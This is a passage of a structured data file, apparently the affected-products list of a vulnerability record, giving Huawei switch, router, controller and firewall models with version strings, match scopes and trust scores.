            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "secospace usg6600",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v500r001c20",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s9700 v200r008c00",
            scope: null,
            trust: 1.2,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s1700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "cloudengine 7800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "ar1200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c20spc026t",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "cloudengine 5800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "ar200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c20spc026t",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c03",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "ac6005",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c10spc200",
         },
         {
            model: "cloudengine 12800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "cloudengine 7800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c02",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r001c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "cloudengine 12800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c05",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "ar3200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c20spc026t",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c02",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c10",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "cloudengine 5800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s1700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c02",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r003c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c10",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c01",
         },
         {
            model: "cloudengine 7800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c02",
         },
         {
            model: "cloudengine 12800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r003c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c00",
         },
         {
            model: "e600",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "cloudengine 8800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c10",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "cloudengine 12800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c01",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "cloudengine 7800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c10",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "cloudengine 6800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "cloudengine 5800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r003c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c01",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "cloudengine 12800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c10",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "cloudengine 6800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c01",
         },
         {
            model: "ar1200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c10cp0582t",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c03",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c01",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c01",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "ar1200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c10hp0581t",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c02",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c01",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r003c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c02",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "cloudengine 8800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "cloudengine 5800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c10",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c03",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c10",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c10",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c01",
         },
         {
            model: "cloudengine 6800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r003c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c01",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c00",
         },
         {
            model: "cloudengine 5800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "cloudengine 7800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r003c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s1700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r007c00",
         },
         {
            model: "cloudengine 6800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c05",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c10",
         },
         {
            model: "ac6605",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c10spc200",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c02",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c02",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c10",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c03",
         },
         {
            model: "cloudengine 6800",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c10",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r002c00",
         },
         {
            model: "ac6005",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ac6605",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar1200",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar200",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar3200",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cloudengine 12800",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cloudengine 5800",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cloudengine 6800",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cloudengine 7800",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cloudengine 8800",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "e600",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s1700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "secospace usg6600",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "secospace usg6600 v500r001c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cloudengine v100r003c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "12800",
         },
         {
            model: "cloudengine v100r005c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "12800",
         },
         {
            model: "cloudengine v100r005c10",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "12800",
         },
         {
            model: "s12700 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r001c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r002c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cloudengine v100r006c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "12800",
         },
         {
            model: "cloudengine v100r005c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "5800",
         },
         {
            model: "cloudengine v100r005c10",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "5800",
         },
         {
            model: "cloudengine v100r006c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "5800",
         },
         {
            model: "cloudengine v100r005c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "6800",
         },
         {
            model: "cloudengine v100r005c10",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "6800",
         },
         {
            model: "cloudengine v100r006c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "6800",
         },
         {
            model: "cloudengine v100r005c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "7800",
         },
         {
            model: "cloudengine v100r005c10",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "7800",
         },
         {
            model: "cloudengine v100r006c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "7800",
         },
         {
            model: "cloudengine v100r006c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "8800",
         },
         {
            model: "cloudengine v100r003c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "5800",
         },
         {
            model: "cloudengine v100r003c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "6800",
         },
         {
            model: "cloudengine v100r003c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "7800",
         },
         {
            model: "cloudengine v200r001c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "12800",
         },
         {
            model: "cloudengine v200r001c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "6800",
         },
         {
            model: "cloudengine v200r001c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "7800",
         },
         {
            model: "cloudengine v200r001c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "8800",
         },
         {
            model: "ac6005 v200r006c10spc200",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar1200 v200r005c10cp0582t",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar200 v200r005c20spc026t",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar3200 v200r005c20spc026t",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "secospace usg6600 v500r001c20",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "secospace usg6600 v500r001c30",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ac6605 v200r006c10spc200",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar1200 v200r005c10hp0581t",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar1200 v200r005c20spc026t",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cloudengine v200r001c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "5800",
         },
         {
            model: "e600 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s1700 v100r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s1700 v100r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s1700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v100r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v100r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v100r006c05",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r003c02",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r003c10",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r005c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r005c02",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r005c03",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v100r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v100r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v100r006c03",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v100r006c05",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r003c02",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r003c10",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r005c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r005c02",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r005c03",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v100r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v100r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v100r006c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r001c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r002c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r003c02",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r003c10",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v100r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v100r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v100r006c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r001c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r001c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r002c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c02",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c10",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v100r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r001c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r002c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r003c02",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r003c10",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v100r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r001c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r002c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r003c02",
            scope: null,
